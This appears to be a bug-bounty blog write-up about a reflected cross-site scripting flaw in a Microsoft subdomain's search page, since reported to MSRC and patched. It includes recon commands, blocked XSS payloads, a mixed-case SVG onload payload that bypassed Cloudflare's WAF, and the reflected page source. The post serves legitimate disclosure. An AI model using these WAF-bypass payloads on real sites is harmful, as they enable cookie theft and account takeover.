Cloudflare Bypass leads to RXSS[Reflected-Cross Site Scripting] in Microsoft
Har Har Mahadevđź”±. This is Prince Roy, a security researcher, also known as royzsec. Back with another write-up about my latest finding[Cross Site Scripting] at Microsoft domain by bypassing Cloudflare. Are you curious about the whole process and my mindset for finding?
So let’s start! As usual, I use a subfinder to collect subdomains. But this time I collected subdomains from https://chaos.projectdiscovery.io/, where you can easily get updated domains. Actually, they update their list every day.
Then by HTTPX, I checked and gathered all live domains.
cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txtThen one by one I checked every domain. I guess in the fourth or fifth domain I found this vulnerability. Actually, that domain's search functionality was vulnerable. So normally I search “Hello”.
Then I saw page view-source because if we just put payload it won’t work because without knowing the functionality, just putting payload will not work and Microsoft domains are using Cloudflare and cdnjs CDN [Content delivery network]
Source code of search function
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>So here, “Hello” was closing via <h> tag and there was no filtration to filter the search input. Then I tried with closing </h1> and normal payloads.
</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>but both times Cloudflare blocked me.
Then I tried my Brahmastra:
FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>Because of the maximum time, this payload helped me to bypass the WAF or Cloudflare in the past. When I tried this, then guess what!!
Boom!! code was injected successfully and popped up on the screen. Source code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>By closing </h1> it helped to inject and the small and capital characters helped to bypass the firewall. Literally, I was like
After I reported it quickly and the next day, the MSRC team accepted this as a valid issue.
And they patched within one day. Again I tried to bypass this but this function is now pretty safe.
Developed code:
<div class="search">
<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>
Priority: P2
Severity: Important
POC:
Impact:
- As an attacker, I can use this attack to steal the cookie of the victim which leads to ATO[Account take over]
- Disclosure of end user files, redirecting the user to some other page or site, or modifying presentation of content.
Hall Of Fame:
Finally, thanks for reading my small blog if you like this please share it with your friends and press the clap button for me which inspires me a lot.
Please follow my social media platforms:
Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/
Github: https://github.com/royzsec
Twitter: https://twitter.com/royzsec
